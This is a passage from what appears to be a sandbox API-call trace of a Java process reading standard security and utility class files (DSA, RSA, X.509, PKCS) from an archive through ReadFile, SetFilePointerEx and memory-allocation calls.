_Source="sun/security/provider/DSAKeyFactory.class" | out: _Dest="sun/security/provider/DSAKeyFactory.class") returned="sun/security/provider/DSAKeyFactory.class" [0108.367] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2801714, lpNewFilePointer=0x208bb50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb50*=41948948) returned 1 [0108.367] ReadFile (in: hFile=0x134, lpBuffer=0x208bba0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bb20, lpOverlapped=0x0 | out: lpBuffer=0x208bba0*, lpNumberOfBytesRead=0x208bb20*=0x1e, lpOverlapped=0x0) returned 1 [0108.370] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280175b, lpNewFilePointer=0x208bbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbb0*=41949019) returned 1 [0108.370] ReadFile (in: hFile=0x134, lpBuffer=0x12d59fb0, nNumberOfBytesToRead=0xf7e, lpNumberOfBytesRead=0x208bb80, lpOverlapped=0x0 | out: lpBuffer=0x12d59fb0*, lpNumberOfBytesRead=0x208bb80*=0xf7e, lpOverlapped=0x0) returned 1 [0108.372] free (_Block=0x12298800) [0108.372] free (_Block=0x1228ed20) [0108.381] strlen (_Str="java/security/spec/DSAPublicKeySpec.class") returned 0x29 [0108.381] malloc (_Size=0x48) returned 0x1228e5a0 [0108.381] malloc (_Size=0xa0) returned 0x123243e0 [0108.381] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33341ae, lpNewFilePointer=0x208bb80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb80*=53690798) returned 1 [0108.381] ReadFile (in: hFile=0x134, lpBuffer=0x123243e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bb50, lpOverlapped=0x0 | out: lpBuffer=0x123243e0*, lpNumberOfBytesRead=0x208bb50*=0xa0, lpOverlapped=0x0) returned 1 [0108.383] malloc (_Size=0x2a) returned 0x12298a80 [0108.383] strcpy (in: _Dest=0x208bd00, _Source="java/security/spec/DSAPublicKeySpec.class" | out: _Dest="java/security/spec/DSAPublicKeySpec.class") returned="java/security/spec/DSAPublicKeySpec.class" [0108.383] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17b15e0, lpNewFilePointer=0x208b780, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b780*=24843744) returned 1 [0108.383] ReadFile (in: hFile=0x134, lpBuffer=0x208b7d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b750, lpOverlapped=0x0 | out: lpBuffer=0x208b7d0*, lpNumberOfBytesRead=0x208b750*=0x1e, lpOverlapped=0x0) returned 1 [0108.384] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17b1627, lpNewFilePointer=0x208b7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7e0*=24843815) returned 1 [0108.384] ReadFile (in: hFile=0x134, lpBuffer=0x12d59fb0, nNumberOfBytesToRead=0x24f, lpNumberOfBytesRead=0x208b7b0, lpOverlapped=0x0 | out: lpBuffer=0x12d59fb0*, lpNumberOfBytesRead=0x208b7b0*=0x24f, lpOverlapped=0x0) returned 1 [0108.385] free (_Block=0x12298900) [0108.385] free (_Block=0x1228ee10) [0108.388] strlen (_Str="sun/security/provider/DSAPublicKeyImpl.class") returned 0x2c [0108.388] malloc (_Size=0x48) returned 0x1228e5f0 [0108.388] malloc (_Size=0xa0) returned 0x12324280 [0108.388] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dbf4e, lpNewFilePointer=0x208bb90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb90*=54378318) returned 1 [0108.388] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bb60, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208bb60*=0xa0, lpOverlapped=0x0) returned 1 [0108.388] malloc (_Size=0x2d) returned 0x12298200 [0108.389] strcpy (in: _Dest=0x208bd10, _Source="sun/security/provider/DSAPublicKeyImpl.class" | out: _Dest="sun/security/provider/DSAPublicKeyImpl.class") returned="sun/security/provider/DSAPublicKeyImpl.class" [0108.389] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2805caa, lpNewFilePointer=0x208b790, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b790*=41966762) returned 1 [0108.389] ReadFile (in: hFile=0x134, lpBuffer=0x208b7e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b760, lpOverlapped=0x0 | out: lpBuffer=0x208b7e0*, lpNumberOfBytesRead=0x208b760*=0x1e, lpOverlapped=0x0) returned 1 [0108.390] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2805cf4, lpNewFilePointer=0x208b7f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7f0*=41966836) returned 1 [0108.390] ReadFile (in: hFile=0x134, lpBuffer=0x12d59fb0, nNumberOfBytesToRead=0x38b, lpNumberOfBytesRead=0x208b7c0, lpOverlapped=0x0 | out: lpBuffer=0x12d59fb0*, lpNumberOfBytesRead=0x208b7c0*=0x38b, lpOverlapped=0x0) returned 1 [0108.391] free (_Block=0x12298a80) [0108.391] free (_Block=0x1228e5a0) [0108.393] strlen (_Str="sun/security/provider/DSAPublicKey.class") returned 0x28 [0108.393] malloc (_Size=0x48) returned 0x1228e5a0 [0108.393] malloc (_Size=0xa0) returned 0x12324490 [0108.393] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f10c0, lpNewFilePointer=0x208b150, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b150*=54464704) returned 1 [0108.393] ReadFile (in: hFile=0x134, lpBuffer=0x12324490, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b120, lpOverlapped=0x0 | out: lpBuffer=0x12324490*, lpNumberOfBytesRead=0x208b120*=0xa0, lpOverlapped=0x0) returned 1 [0108.393] malloc (_Size=0x29) returned 0x12299080 [0108.393] strcpy (in: _Dest=0x208b2d0, _Source="sun/security/provider/DSAPublicKey.class" | out: _Dest="sun/security/provider/DSAPublicKey.class") returned="sun/security/provider/DSAPublicKey.class" [0108.393] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b12d91, lpNewFilePointer=0x208ad50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ad50*=45165969) returned 1 [0108.393] ReadFile (in: hFile=0x134, lpBuffer=0x208ada0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ad20, lpOverlapped=0x0 | out: lpBuffer=0x208ada0*, lpNumberOfBytesRead=0x208ad20*=0x1e, lpOverlapped=0x0) returned 1 [0108.402] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b12dd7, lpNewFilePointer=0x208adb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208adb0*=45166039) returned 1 [0108.402] ReadFile (in: hFile=0x134, lpBuffer=0x12d5a500, nNumberOfBytesToRead=0xa29, lpNumberOfBytesRead=0x208ad80, lpOverlapped=0x0 | out: lpBuffer=0x12d5a500*, lpNumberOfBytesRead=0x208ad80*=0xa29, lpOverlapped=0x0) returned 1 [0108.403] free (_Block=0x12298200) [0108.404] free (_Block=0x1228e5f0) [0108.405] strlen (_Str="java/security/interfaces/DSAPublicKey.class") returned 0x2b [0108.405] malloc (_Size=0x48) returned 0x1228ed20 [0108.405] malloc (_Size=0xa0) returned 0x12324490 [0108.405] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f1067, lpNewFilePointer=0x208a690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a690*=54464615) returned 1 [0108.405] ReadFile (in: hFile=0x134, lpBuffer=0x12324490, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208a660, lpOverlapped=0x0 | out: lpBuffer=0x12324490*, lpNumberOfBytesRead=0x208a660*=0xa0, lpOverlapped=0x0) returned 1 [0108.405] malloc (_Size=0x2c) returned 0x122985c0 [0108.405] strcpy (in: _Dest=0x208a810, _Source="java/security/interfaces/DSAPublicKey.class" | out: _Dest="java/security/interfaces/DSAPublicKey.class") returned="java/security/interfaces/DSAPublicKey.class" [0108.405] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b12c3f, lpNewFilePointer=0x208a290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a290*=45165631) returned 1 [0108.405] ReadFile (in: hFile=0x134, lpBuffer=0x208a2e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208a260, lpOverlapped=0x0 | out: lpBuffer=0x208a2e0*, lpNumberOfBytesRead=0x208a260*=0x1e, lpOverlapped=0x0) returned 1 [0108.405] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b12c88, lpNewFilePointer=0x208a2f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208a2f0*=45165704) returned 1 [0108.405] ReadFile (in: hFile=0x134, lpBuffer=0x12d5b0f0, nNumberOfBytesToRead=0x109, lpNumberOfBytesRead=0x208a2c0, lpOverlapped=0x0 | out: lpBuffer=0x12d5b0f0*, lpNumberOfBytesRead=0x208a2c0*=0x109, lpOverlapped=0x0) returned 1 [0108.406] free (_Block=0x12299080) [0108.406] free (_Block=0x1228e5a0) [0108.407] strlen (_Str="java/security/interfaces/DSAKey.class") returned 0x25 [0108.407] malloc (_Size=0x48) returned 0x1228ed70 [0108.407] malloc (_Size=0xa0) returned 0x12324960 [0108.407] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f1014, lpNewFilePointer=0x2089bd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089bd0*=54464532) returned 1 [0108.407] ReadFile (in: hFile=0x134, lpBuffer=0x12324960, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2089ba0, lpOverlapped=0x0 | out: lpBuffer=0x12324960*, lpNumberOfBytesRead=0x2089ba0*=0xa0, lpOverlapped=0x0) returned 1 [0108.407] malloc (_Size=0x26) returned 0x122fa140 [0108.407] strcpy (in: _Dest=0x2089d50, _Source="java/security/interfaces/DSAKey.class" | out: _Dest="java/security/interfaces/DSAKey.class") returned="java/security/interfaces/DSAKey.class" [0108.407] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b12b6c, lpNewFilePointer=0x20897d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x20897d0*=45165420) returned 1 [0108.408] ReadFile (in: hFile=0x134, lpBuffer=0x2089820, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x20897a0, lpOverlapped=0x0 | out: lpBuffer=0x2089820*, lpNumberOfBytesRead=0x20897a0*=0x1e, lpOverlapped=0x0) returned 1 [0108.408] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2b12baf, lpNewFilePointer=0x2089830, dwMoveMethod=0x0 | out: lpNewFilePointer=0x2089830*=45165487) returned 1 [0108.408] ReadFile (in: hFile=0x134, lpBuffer=0x12d5b3a0, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x2089800, lpOverlapped=0x0 | out: lpBuffer=0x12d5b3a0*, lpNumberOfBytesRead=0x2089800*=0x90, lpOverlapped=0x0) returned 1 [0108.408] free (_Block=0x122985c0) [0108.408] free (_Block=0x1228ed20) [0108.426] strlen (_Str="sun/security/x509/BasicConstraintsExtension") returned 0x2b [0108.427] strlen (_Str="sun/security/x509/BasicConstraintsExtension.class") returned 0x31 [0108.427] malloc (_Size=0x48) returned 0x1228eb90 [0108.427] malloc (_Size=0xa0) returned 0x12324490 [0108.427] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e43da, lpNewFilePointer=0x208c110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c110*=54412250) returned 1 [0108.427] ReadFile (in: hFile=0x134, lpBuffer=0x12324490, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0e0, lpOverlapped=0x0 | out: lpBuffer=0x12324490*, lpNumberOfBytesRead=0x208c0e0*=0xa0, lpOverlapped=0x0) returned 1 [0108.427] malloc (_Size=0x32) returned 0x12298240 [0108.427] strcpy (in: _Dest=0x208c290, _Source="sun/security/x509/BasicConstraintsExtension.class" | out: _Dest="sun/security/x509/BasicConstraintsExtension.class") returned="sun/security/x509/BasicConstraintsExtension.class" [0108.428] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x297daa5, lpNewFilePointer=0x208bd10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd10*=43506341) returned 1 [0108.428] ReadFile (in: hFile=0x134, lpBuffer=0x208bd60, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bce0, lpOverlapped=0x0 | out: lpBuffer=0x208bd60*, lpNumberOfBytesRead=0x208bce0*=0x1e, lpOverlapped=0x0) returned 1 [0108.429] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x297daf4, lpNewFilePointer=0x208bd70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd70*=43506420) returned 1 [0108.429] ReadFile (in: hFile=0x134, lpBuffer=0x12d59fb0, nNumberOfBytesToRead=0xf44, lpNumberOfBytesRead=0x208bd40, lpOverlapped=0x0 | out: lpBuffer=0x12d59fb0*, lpNumberOfBytesRead=0x208bd40*=0xf44, lpOverlapped=0x0) returned 1 [0108.430] free (_Block=0x122fa140) [0108.430] free (_Block=0x1228ed70) [0108.443] strlen (_Str="sun/security/pkcs/SignerInfo.class") returned 0x22 [0108.443] malloc (_Size=0x48) returned 0x1228e140 [0108.443] malloc (_Size=0xa0) returned 0x12324750 [0108.444] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33db7da, lpNewFilePointer=0x208c0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0a0*=54376410) returned 1 [0108.444] ReadFile (in: hFile=0x134, lpBuffer=0x12324750, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c070, lpOverlapped=0x0 | out: lpBuffer=0x12324750*, lpNumberOfBytesRead=0x208c070*=0xa0, lpOverlapped=0x0) returned 1 [0108.444] malloc (_Size=0x23) returned 0x122fa3e0 [0108.444] strcpy (in: _Dest=0x208c220, _Source="sun/security/pkcs/SignerInfo.class" | out: _Dest="sun/security/pkcs/SignerInfo.class") returned="sun/security/pkcs/SignerInfo.class" [0108.444] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x27f4be7, lpNewFilePointer=0x208bca0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bca0*=41896935) returned 1 [0108.444] ReadFile (in: hFile=0x134, lpBuffer=0x208bcf0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc70, lpOverlapped=0x0 | out: lpBuffer=0x208bcf0*, lpNumberOfBytesRead=0x208bc70*=0x1e, lpOverlapped=0x0) returned 1 [0108.446] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x27f4c27, lpNewFilePointer=0x208bd00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd00*=41896999) returned 1 [0108.446] ReadFile (in: hFile=0x134, lpBuffer=0x12d59fb0, nNumberOfBytesToRead=0x2dfd, lpNumberOfBytesRead=0x208bcd0, lpOverlapped=0x0 | out: lpBuffer=0x12d59fb0*, lpNumberOfBytesRead=0x208bcd0*=0x2dfd, lpOverlapped=0x0) returned 1 [0108.448] free (_Block=0x12298240) [0108.448] free (_Block=0x1228eb90) [0108.460] strlen (_Str="java/security/CryptoPrimitive.class") returned 0x23 [0108.460] malloc (_Size=0x48) returned 0x1228ef50 [0108.460] malloc (_Size=0xa0) returned 0x12324e30 [0108.460] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3330f5a, lpNewFilePointer=0x208b960, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b960*=53677914) returned 1 [0108.460] ReadFile (in: hFile=0x134, lpBuffer=0x12324e30, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b930, lpOverlapped=0x0 | out: lpBuffer=0x12324e30*, lpNumberOfBytesRead=0x208b930*=0xa0, lpOverlapped=0x0) returned 1 [0108.461] malloc (_Size=0x24) returned 0x122fa320 [0108.462] strcpy (in: _Dest=0x208bae0, _Source="java/security/CryptoPrimitive.class" | out: _Dest="java/security/CryptoPrimitive.class") returned="java/security/CryptoPrimitive.class" [0108.462] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17752cb, lpNewFilePointer=0x208b560, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b560*=24597195) returned 1 [0108.462] ReadFile (in: hFile=0x134, lpBuffer=0x208b5b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b530, lpOverlapped=0x0 | out: lpBuffer=0x208b5b0*, lpNumberOfBytesRead=0x208b530*=0x1e, lpOverlapped=0x0) returned 1 [0108.463] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x177530c, lpNewFilePointer=0x208b5c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5c0*=24597260) returned 1 [0108.463] ReadFile (in: hFile=0x134, lpBuffer=0x12d59fb0, nNumberOfBytesToRead=0x4e2, lpNumberOfBytesRead=0x208b590, lpOverlapped=0x0 | out: lpBuffer=0x12d59fb0*, lpNumberOfBytesRead=0x208b590*=0x4e2, lpOverlapped=0x0) returned 1 [0108.463] free (_Block=0x122fa3e0) [0108.464] free (_Block=0x1228e140) [0108.473] strlen (_Str="java/util/EnumSet.class") returned 0x17 [0108.477] malloc (_Size=0x48) returned 0x1228ea50 [0108.477] malloc (_Size=0xa0) returned 0x12324750 [0108.477] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x333c001, lpNewFilePointer=0x208b7e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7e0*=53723137) returned 1 [0108.477] ReadFile (in: hFile=0x134, lpBuffer=0x12324750, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b7b0, lpOverlapped=0x0 | out: lpBuffer=0x12324750*, lpNumberOfBytesRead=0x208b7b0*=0xa0, lpOverlapped=0x0) returned 1 [0108.477] malloc (_Size=0x18) returned 0x123232f0 [0108.478] strcpy (in: _Dest=0x208b960, _Source="java/util/EnumSet.class" | out: _Dest="java/util/EnumSet.class") returned="java/util/EnumSet.class" [0108.478] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x18bf66b, lpNewFilePointer=0x208b3e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b3e0*=25949803) returned 1 [0108.478] ReadFile (in: hFile=0x134, lpBuffer=0x208b430, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b3b0, lpOverlapped=0x0 | out: lpBuffer=0x208b430*, lpNumberOfBytesRead=0x208b3b0*=0x1e, lpOverlapped=0x0) returned 1 [0108.479] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x18bf6a0, lpNewFilePointer=0x208b440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b440*=25949856) returned 1 [0108.479] ReadFile (in: hFile=0x134, lpBuffer=0x12d59fb0, nNumberOfBytesToRead=0x1402, lpNumberOfBytesRead=0x208b410, lpOverlapped=0x0 | out: lpBuffer=0x12d59fb0*, lpNumberOfBytesRead=0x208b410*=0x1402, lpOverlapped=0x0) returned 1 [0108.481] free (_Block=0x122fa320) [0108.482] free (_Block=0x1228ef50) [0108.608] strlen (_Str="sun/security/util/ConstraintsParameters.class") returned 0x2d [0108.608] malloc (_Size=0x48) returned 0x1228e5a0 [0108.608] malloc (_Size=0xa0) returned 0x12324280 [0108.608] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e2b4b, lpNewFilePointer=0x208c090, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c090*=54405963) returned 1 [0108.608] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c060, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208c060*=0xa0, lpOverlapped=0x0) returned 1 [0108.609] malloc (_Size=0x2e) returned 0x12298840 [0108.616] strlen (_Str="java/util/HashMap$KeySet.class") returned 0x1e [0108.616] malloc (_Size=0x48) returned 0x1228e5f0 [0108.616] malloc (_Size=0xa0) returned 0x12324280 [0108.617] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x340f4d7, lpNewFilePointer=0x208be50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be50*=54588631) returned 1 [0108.617] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208be20, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208be20*=0xa0, lpOverlapped=0x0) returned 1 [0108.619] malloc (_Size=0x1f) returned 0x122fa320 [0108.634] strlen (_Str="[B") returned 0x2 [0108.653] strlen (_Str="[Ljava/lang/String;") returned 0x13 [0108.653] strlen (_Str="sun/security/util/ObjectIdentifier") returned 0x22 [0108.654] strlen (_Str="java/util/Date") returned 0xe [0108.655] strlen (_Str="[Lsun/security/pkcs/SignerInfo;") returned 0x1f [0108.655] strlen (_Str="java/lang/String") returned 0x10 [0108.656] strlen (_Str="sun/security/x509/CertificateExtensions") returned 0x27 [0108.663] strlen (_Str="java/text/Normalizer$Form.class") returned 0x1f [0108.663] malloc (_Size=0x48) returned 0x1228ee60 [0108.663] malloc (_Size=0xa0) returned 0x12324070 [0108.663] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33360b2, lpNewFilePointer=0x208bbd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbd0*=53698738) returned 1 [0108.663] ReadFile (in: hFile=0x134, lpBuffer=0x12324070, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bba0, lpOverlapped=0x0 | out: lpBuffer=0x12324070*, lpNumberOfBytesRead=0x208bba0*=0xa0, lpOverlapped=0x0) returned 1 [0108.665] malloc (_Size=0x20) returned 0x122fa470 [0108.693] strlen (_Str="sun/security/util/KeyUtil.class") returned 0x1f [0108.693] malloc (_Size=0x48) returned 0x1228e5a0 [0108.694] malloc (_Size=0xa0) returned 0x123243e0 [0108.694] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e3172, lpNewFilePointer=0x208bbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bbb0*=54407538) returned 1 [0108.694] ReadFile (in: hFile=0x134, lpBuffer=0x123243e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bb80, lpOverlapped=0x0 | out: lpBuffer=0x123243e0*, lpNumberOfBytesRead=0x208bb80*=0xa0, lpOverlapped=0x0) returned 1 [0108.694] malloc (_Size=0x20) returned 0x122fa140 [0108.701] strlen (_Str="java/security/Signature.class") returned 0x1d [0108.701] malloc (_Size=0x48) returned 0x1228ea50 [0108.701] malloc (_Size=0xa0) returned 0x12324120 [0108.701] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33f13c9, lpNewFilePointer=0x208bdd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdd0*=54465481) returned 1 [0108.701] ReadFile (in: hFile=0x134, lpBuffer=0x12324120, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bda0, lpOverlapped=0x0 | out: lpBuffer=0x12324120*, lpNumberOfBytesRead=0x208bda0*=0xa0, lpOverlapped=0x0) returned 1 [0108.701] malloc (_Size=0x1e) returned 0x122fa140 [0108.714] strlen (_Str="java/security/Signature$Delegate.class") returned 0x26 [0108.714] malloc (_Size=0x48) returned 0x1228e5f0 [0108.714] malloc (_Size=0xa0) returned 0x12324280 [0108.714] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ef5a8, lpNewFilePointer=0x208c010, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c010*=54457768) returned 1 [0108.714] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bfe0, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208bfe0*=0xa0, lpOverlapped=0x0) returned 1 [0108.714] malloc (_Size=0x27) returned 0x122fa1d0 [0108.718] strlen (_Str="java/security/interfaces/RSAPublicKey") returned 0x25 [0108.719] strlen (_Str="java/security/interfaces/RSAPrivateKey") returned 0x26 [0108.719] strlen (_Str="java/security/interfaces/RSAPrivateKey.class") returned 0x2c [0108.719] malloc (_Size=0x48) returned 0x1228f040 [0108.719] malloc (_Size=0xa0) returned 0x12324330 [0108.719] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3334049, lpNewFilePointer=0x208c2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2c0*=53690441) returned 1 [0108.719] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c290, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208c290*=0xa0, lpOverlapped=0x0) returned 1 [0108.720] malloc (_Size=0x2d) returned 0x122984c0 [0108.724] strlen (_Str="sun/security/rsa/RSASignature$SHA1withRSA") returned 0x29 [0108.725] strlen (_Str="sun/security/rsa/RSASignature$SHA1withRSA.class") returned 0x2f [0108.725] malloc (_Size=0x48) returned 0x1228ed20 [0108.725] malloc (_Size=0xa0) returned 0x12324280 [0108.725] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33df610, lpNewFilePointer=0x208c310, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c310*=54392336) returned 1 [0108.725] ReadFile (in: hFile=0x134, lpBuffer=0x12324280, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c2e0, lpOverlapped=0x0 | out: lpBuffer=0x12324280*, lpNumberOfBytesRead=0x208c2e0*=0xa0, lpOverlapped=0x0) returned 1 [0108.725] malloc (_Size=0x30) returned 0x12298400 [0108.733] strlen (_Str="sun/security/rsa/RSAPrivateKeyImpl.class") returned 0x28 [0108.733] malloc (_Size=0x48) returned 0x1228ef50 [0108.733] malloc (_Size=0xa0) returned 0x12324330 [0108.733] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33df4ad, lpNewFilePointer=0x208bde0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bde0*=54391981) returned 1 [0108.733] ReadFile (in: hFile=0x134, lpBuffer=0x12324330, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bdb0, lpOverlapped=0x0 | out: lpBuffer=0x12324330*, lpNumberOfBytesRead=0x208bdb0*=0xa0, lpOverlapped=0x0) returned 1 [0108.733] malloc (_Size=0x29) returned 0x12298ec0 [0108.740] strlen (_Str="sun/security/rsa/RSAPadding.class") returned 0x21 [0108.741] malloc (_Size=0x48) returned 0x1228ed20 [0108.741] malloc (_Size=0xa0) returned 0x12324070 [0108.741] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33df405, lpNewFilePointer=0x208bb00, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bb00*=54391813) returned 1 [0108.741] ReadFile (in: hFile=0x134, lpBuffer=0x12324070, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bad0, lpOverlapped=0x0 | out: lpBuffer=0x12324070*, lpNumberOfBytesRead=0x208bad0*=0xa0, lpOverlapped=0x0) returned 1 [0108.741] malloc (_Size=0x22) returned 0x122fa4d0 [0108.766] strlen (_Str="java/math/MutableBigInteger.class") returned 0x21 [0108.766] malloc (_Size=0x48) returned 0x1228ef50 [0108.766] malloc (_Size=0xa0) returned 0x12324ac0 [0108.766] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33ef266, lpNewFilePointer=0x208b9a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9a0*=54456934) returned 1 [0108.766] ReadFile (in: hFile=0x134, lpBuffer=0x12324ac0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b970, lpOverlapped=0x0 | out: lpBuffer=0x12324ac0*, lpNumberOfBytesRead=0x208b970*=0xa0, lpOverlapped=0x0) returned 1 [0108.767] malloc (_Size=0x22) returned 0x122fa1d0 [0108.800] strlen (_Str="javax/crypto/BadPaddingException.class") returned 0x26 [0108.800] strlen (_Str="javax/crypto/BadPaddingException.class") returned 0x26 [0108.800] malloc (_Size=0x48) returned 0x1228ed20 [0108.800] malloc (_Size=0xa0) returned 0x123246a0 [0108.800] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x1c1dc, lpNewFilePointer=0x208be50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be50*=115164) returned 1 [0108.800] ReadFile (in: hFile=0x2c8, lpBuffer=0x123246a0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208be20, lpOverlapped=0x0 | out: lpBuffer=0x123246a0*, lpNumberOfBytesRead=0x208be20*=0xa0, lpOverlapped=0x0) returned 1 [0108.800] malloc (_Size=0x27) returned 0x122fa470 [0108.810] strlen (_Str="sun/security/provider/certpath/X509CertPath.class") returned 0x31 [0108.810] malloc (_Size=0x48) returned 0x1228e5a0 [0108.810] malloc (_Size=0xa0) returned 0x12324750 [0108.810] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33decb3, lpNewFilePointer=0x208c0f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0f0*=54389939) returned 1 [0108.811] ReadFile (in: hFile=0x134, lpBuffer=0x12324750, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0c0, lpOverlapped=0x0 | out: lpBuffer=0x12324750*, lpNumberOfBytesRead=0x208c0c0*=0xa0, lpOverlapped=0x0) returned 1 [0108.811] malloc 